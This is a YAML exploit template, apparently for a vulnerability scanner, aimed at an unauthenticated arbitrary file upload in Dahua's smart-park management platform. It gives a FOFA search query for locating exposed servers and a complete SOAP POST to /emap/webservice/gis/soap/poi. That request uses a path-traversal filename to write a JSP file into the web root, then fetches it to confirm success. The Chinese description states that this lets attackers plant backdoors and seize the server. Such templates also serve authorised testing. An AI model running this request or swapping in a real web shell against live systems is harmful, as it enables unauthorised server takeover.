product: 大华智慧园区综合管理平台
vName: 大华智慧园区综合管理平台 前台任意文件上传
type: 文件上传
vID: [ ]
level: 3
vDesc: 大华智慧园区综合管理平台 /emap/webservice/gis/soap/poi接口处存在任意文件上传漏洞，未授权的攻击者可以上传后门文件，从而控制服务器权限。
version: ''
note: ''
search:
  FOFA: app="dahua-智慧园区综合管理平台"
protocol: http
link: https://developer.aliyun.com/article/1333161
fix: [ ]
model: ''
logic: and
exploit:
  - exp:
      method: post
      follow: false
      path: /emap/webservice/gis/soap/poi
      data: <soapenv:Envelope xmlns:soapenv="http://schemas.xmlsoap.org/soap/envelope/" xmlns:res="http://response.webservice.poi.mapbiz.emap.dahuatech.com/"><soapenv:Header/><soapenv:Body><res:uploadPicFile><arg0>/../../52e039302a62d077.jsp</arg0><arg1>OTVjYzY0ZGQyODI1ZjlkZjEzZWM0YWQ2ODNlY2YzMzk=</arg1></res:uploadPicFile></soapenv:Body></soapenv:Envelope>
    verify:
      path: /upload/52e039302a62d077.jsp
      logic: and
      check:
        - status: 200
          body:
            value:
              - 95cc64dd2825f9df13ec4ad683ecf339
            logic: and